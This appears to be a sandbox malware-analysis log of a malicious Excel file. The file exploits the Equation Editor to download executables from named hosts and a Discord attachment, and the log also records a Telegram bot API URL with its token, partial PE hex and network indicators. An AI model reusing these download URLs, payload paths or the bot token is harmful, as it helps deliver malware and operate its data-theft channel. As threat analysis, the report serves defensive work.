Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 117MB

Networking

barindex
Source: Yara match File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: global traffic HTTP traffic detected: GET /attachments/1001850193580392480/1002961152617222144/seven.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /htdocs/zTALg.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View IP Address: 162.159.129.233 162.159.129.233
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Aug 2022 09:41:36 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Sun, 31 Jul 2022 13:41:30 GMTETag: "34400-5e51a0a6efe70"Accept-Ranges: bytesContent-Length: 214016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 1
Source: global traffic HTTP traffic detected: GET /giving/qGTGx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pkusukoharjo.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com,Rj equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://109.206.241.81/htdocs/zTALg.exe
Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1007008986.0000000002443000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://109.206.241.81P
Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006721618.000000000067D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/
Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com
Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1001850193580392480/1002961152617222144/seven.dll
Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pkusukoharjo.com/
Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pkusukoharjo.com/giving/qGTGx.exe
Source: dbSYXB9S.Pu6cL String found in binary or memory: https://pkusukoharjo.com/giving/qGTGx.exej
Source: EQNEDT32.EXE, 00000002.00000002.996175505.000000000056F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pkusukoharjo.com/giving/qGTGx.exejjC:
Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pkusukoharjo.com/y
Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84E7CB3E.png Jump to behavior
Source: unknown DNS traffic detected: queries for: pkusukoharjo.com
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8B6F LoadLibraryW,URLDownloadToFileW, 2_2_038A8B6F
